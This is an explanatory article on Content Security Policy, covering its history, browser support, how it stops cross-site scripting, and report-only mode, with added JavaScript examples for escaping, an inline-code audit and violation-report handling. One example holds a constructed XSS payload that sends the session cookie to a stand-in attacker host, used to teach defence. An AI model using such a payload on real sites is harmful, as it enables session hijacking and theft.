Content Security Policy

Content Security Policy (CSP) is a security concept for preventing cross-site scripting and other attacks that work by injecting data into web pages. It is a W3C Working Draft for the security of web applications.

CSP was originally designed by the Mozilla Foundation and was first supported, experimentally, in Firefox 4.0.

Status

The official name of the header field is Content-Security-Policy. Mozilla Firefox supports it from version 23, Google Chrome from version 25.

The pre-release version of Internet Explorer uses the name X-Content-Security-Policy. Older versions of Google Chrome (2011) and other WebKit browsers (Safari) use X-WebKit-CSP. Support for the draft in Firefox and Chrome is almost complete.

A version 1.1 is currently being prepared by the W3C.

Problem with the classical security concept

Web pages can contain active content, for example in the form of JavaScript code. When web browsers execute this code, they enforce the same-origin policy. This means that code from one origin is not allowed to access the contents of another origin. For example, code in an attacker's web page must not be able to access the elements of an online banking website.

In practice, however, cross-site scripting vulnerabilities are very common, and they undermine the same-origin policy. A cross-site scripting vulnerability arises when faulty escaping allows an attacker to smuggle code into a website. From the browser's perspective this injected code comes from the same origin as the affected website, so the same-origin policy offers no protection against it.
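As an added illustration that is not part of the original article, the following JavaScript shows the faulty escaping described above beside a corrected version. The greeting template, the attacker input and the helper names are constructed for this example:

```javascript
// Added example (not from the original article): why faulty escaping
// creates a cross-site scripting hole. A template builds HTML from a
// user-supplied name. Without escaping, a crafted name becomes markup that
// the browser executes as if it came from the site itself.

// Vulnerable: the raw string is spliced straight into the HTML.
function renderGreetingUnsafe(name) {
  return "<p>Hello, " + name + "!</p>";
}

// Hardened: every character with meaning in HTML is replaced by its entity,
// so the input can only ever be text, never markup. The ampersand must be
// handled first, otherwise the entities produced later would be re-escaped.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function renderGreetingSafe(name) {
  return "<p>Hello, " + escapeHtml(name) + "!</p>";
}

// Crude check, used only for this demonstration: does the output contain a
// script element or an inline event handler that a browser would execute?
function containsExecutableMarkup(html) {
  return /<script\b/i.test(html) || /\son\w+\s*=/i.test(html);
}

// Constructed attacker input: closes the paragraph and injects a script that
// ships the session cookie to a host the attacker controls (hypothetical).
const payload =
  '</p><script>document.location="http://evil.example/?c="+document.cookie</script><p>';

// Renders the same input both ways so the difference can be compared.
function demo() {
  return {
    unsafe: renderGreetingUnsafe(payload),
    safe: renderGreetingSafe(payload),
  };
}
```

In the unsafe rendering the payload becomes a real script element in the page's own origin; in the safe rendering the same bytes are shown as literal text. CSP addresses the case where such escaping has been forgotten: even the injected inline script would not run under a policy that disallows inline code.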

Operation

Concept

The cause of cross-site scripting vulnerabilities lies in faulty dynamic content generation by the web application. Content Security Policy therefore enforces a strict separation between content data in the HTML code and external files containing the JavaScript code. As a rule, the JavaScript code is static and is not generated dynamically.

Forbidden constructs and alternatives

The separation between code and data is achieved by forbidding constructs that embed JavaScript code directly in the HTML and by providing alternatives for each of them.
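The following JavaScript is an added example, not code from the original article, serving both the concept above and this section: a crude audit that scans an HTML document for the constructs a policy without 'unsafe-inline' and 'unsafe-eval' refuses to run, and names the alternative for each. The two sample pages, the file names /static/app.js and /static/app.css and the contents of the script are constructed for the example:

```javascript
// Added example, not part of the original article. Scans an HTML document
// (or a script) for the constructs a CSP without 'unsafe-inline' and
// 'unsafe-eval' refuses to run, and names the alternative for each.
// Regexes, not an HTML parser: a migration aid, not a security boundary.
const RULES = [
  { construct: "inline <script> element", directive: "script-src",
    alternative: "move the code to an external .js file loaded via <script src=...>",
    pattern: /<script\b(?![^>]*\bsrc\s*=)[^>]*>[\s\S]*?<\/script>/gi },
  { construct: "inline event handler attribute (onclick=, onload=, ...)", directive: "script-src",
    alternative: "register the handler with addEventListener() from an external script",
    pattern: /\son[a-z]+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi },
  { construct: "javascript: URL", directive: "script-src",
    alternative: "use a real href and attach a click listener in an external script",
    pattern: /(?:href|src|action)\s*=\s*["']?\s*javascript:/gi },
  { construct: "inline <style> element or style= attribute", directive: "style-src",
    alternative: "move the rules to an external style sheet and toggle classes from script",
    pattern: /<style\b[^>]*>[\s\S]*?<\/style>|\sstyle\s*=\s*("[^"]*"|'[^']*')/gi },
  { construct: "string-to-code evaluation (eval, new Function, setTimeout with a string)",
    directive: "script-src ('unsafe-eval')",
    alternative: "parse data with JSON.parse() and pass functions, not strings, to setTimeout()",
    pattern: /\beval\s*\(|\bnew\s+Function\s*\(|\bset(?:Timeout|Interval)\s*\(\s*["']/g },
];

// Returns one finding per match: what was found, which directive blocks it,
// what to replace it with, and a short excerpt of the offending markup.
function auditHtml(text) {
  const findings = [];
  for (const rule of RULES) {
    for (const m of text.match(rule.pattern) || []) {
      findings.push({ construct: rule.construct, directive: rule.directive,
        alternative: rule.alternative,
        snippet: m.length > 60 ? m.slice(0, 57) + "..." : m });
    }
  }
  return findings;
}

// Counts findings per directive, e.g. { "script-src": 3, "style-src": 2 }.
function summarize(findings) {
  const counts = {};
  for (const f of findings) counts[f.directive] = (counts[f.directive] || 0) + 1;
  return counts;
}

// Constructed "before" page: every forbidden construct appears at least once.
const BEFORE_HTML = [
  "<!DOCTYPE html>",
  "<html><head>",
  "<style>.hidden { display: none; }</style>",
  "<script>",
  "  var user = eval('(' + userJson + ')');",
  "  function greet() { alert('Hello ' + user.name); }",
  "</script>",
  "</head><body>",
  "<button onclick=\"greet()\">Greet</button>",
  "<a href=\"javascript:void(0)\" style=\"color: red\">Noop link</a>",
  "<script src=\"/static/app.js\"></script>",
  "</body></html>",
].join("\n");

// The same page rewritten for CSP: all code lives in /static/app.js, all
// styling in /static/app.css, and the data the script needs travels in a
// data- attribute instead of being evaluated from a string.
const AFTER_HTML = [
  "<!DOCTYPE html>",
  "<html><head>",
  "<link rel=\"stylesheet\" href=\"/static/app.css\">",
  "<script src=\"/static/app.js\"></script>",
  "</head><body data-user='{\"name\":\"Alice\"}'>",
  "<button id=\"greet\">Greet</button>",
  "<a href=\"/noop\" id=\"noop\" class=\"warn\">Noop link</a>",
  "</body></html>",
].join("\n");

// Constructed contents of /static/app.js for the rewritten page.
const APP_JS = [
  "var user = JSON.parse(document.body.dataset.user);",
  "function greet() { alert('Hello ' + user.name); }",
  "document.getElementById('greet').addEventListener('click', greet);",
  "document.getElementById('noop').addEventListener('click', function (e) { e.preventDefault(); });",
].join("\n");
```

Running auditHtml over BEFORE_HTML yields six findings (three against script-src, two against style-src, one that would need 'unsafe-eval'); the rewritten page and its external script yield none. The eval rule is applied to the inline script text as well, since code inside an inline script is the usual place where string evaluation hides.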

Evaluation, reporting

To test the effects of enabling CSP for a web application without actually enforcing it, the W3C draft also provides for logging violations of the policy to the URL specified with report-uri. For this, report-only mode must be used, by sending the policy in the Content-Security-Policy-Report-Only header instead. The browser then continues to load and execute everything as before, but reports each violation.
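The following JavaScript is an added example, not code from the original article. It shows the same policy sent under the enforcing and the report-only header names, the JSON body a browser POSTs to the report-uri, and a small triage of the reports an operator collects while in report-only mode. The policy, the host names and the /csp-report path are assumptions chosen for the demonstration:

```javascript
// Added example, not part of the original article. Policy, hosts and the
// report path below are assumptions for the demonstration.

// The policy kept as data, so the same directives serve both header names.
const POLICY = {
  "default-src": ["'self'"],
  "script-src": ["'self'", "https://static.example.org"],
  "style-src": ["'self'"],
  "img-src": ["'self'", "data:"],
  "report-uri": ["/csp-report"],
};

// Serialises the directive map into header-value syntax: directives are
// separated by "; ", the sources within a directive by spaces.
function serializePolicy(policy) {
  return Object.keys(policy)
    .map((d) => d + " " + policy[d].join(" "))
    .join("; ");
}

// Report-only mode sends the same policy under a different header name.
// Nothing is blocked; the browser only POSTs a report for each violation.
function cspHeader(policy, reportOnly) {
  return {
    name: reportOnly ? "Content-Security-Policy-Report-Only" : "Content-Security-Policy",
    value: serializePolicy(policy),
  };
}

// Browsers POST violations as JSON with one top-level "csp-report" key.
// Returns the fields an operator looks at first, or null for bodies that are
// not reports (the endpoint is public and receives arbitrary POSTs).
function parseViolationReport(body) {
  let json;
  try {
    json = JSON.parse(body);
  } catch (e) {
    return null;
  }
  const r = json && json["csp-report"];
  if (!r || typeof r !== "object") return null;
  return {
    documentUri: r["document-uri"] || "",
    violatedDirective: r["violated-directive"] || "",
    // For inline script or eval the blocked-uri is empty or a keyword
    // rather than a URL, depending on the browser.
    blockedUri: r["blocked-uri"] || "",
  };
}

function originOf(uri) {
  try { return new URL(uri).origin; } catch (e) { return null; }
}

// Rough triage of a single report: first-party violations mean the policy
// is stricter than the site, third-party ones need a look at the host.
function triage(report) {
  const docOrigin = originOf(report.documentUri);
  const blockedOrigin = originOf(report.blockedUri);
  if (!blockedOrigin) return "inline or eval: rewrite the page rather than adding 'unsafe-inline'";
  if (blockedOrigin === docOrigin) return "first-party resource: the policy is stricter than the site";
  return "third-party resource: check whether " + blockedOrigin + " is expected";
}

// Aggregates many raw POST bodies into counts per (directive, blocked URI),
// which is the view that shows what would break once the policy is enforced.
function aggregateReports(bodies) {
  const counts = {};
  for (const body of bodies) {
    const r = parseViolationReport(body);
    if (!r) continue; // malformed or foreign POSTs are dropped
    const key = r.violatedDirective + " -> " + (r.blockedUri || "(no URI: inline or eval)");
    counts[key] = (counts[key] || 0) + 1;
  }
  return counts;
}

// Constructed sample reports: two visitors hitting the same inline script,
// one blocked tracking image, and one body that is not a report at all.
const inlineReport = { "csp-report": {
  "document-uri": "https://www.example.org/account", "referrer": "",
  "blocked-uri": "",
  "violated-directive": "script-src 'self' https://static.example.org",
  "original-policy": serializePolicy(POLICY) } };
const imageReport = { "csp-report": {
  "document-uri": "https://www.example.org/account", "referrer": "",
  "blocked-uri": "https://tracker.example.net/pixel.gif",
  "violated-directive": "img-src 'self' data:",
  "original-policy": serializePolicy(POLICY) } };
const SAMPLE_REPORTS = [
  JSON.stringify(inlineReport), JSON.stringify(inlineReport),
  JSON.stringify(imageReport), "<html>not a report</html>",
];
```

After a period in report-only mode, aggregateReports over the collected bodies lists every (directive, resource) pair that the enforcing header would block. Pairs that point at the site's own resources are fixed by adjusting the policy; pairs that point at inline code are fixed by rewriting the page; unexpected third-party hosts deserve an investigation before the policy is switched to the Content-Security-Policy header.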
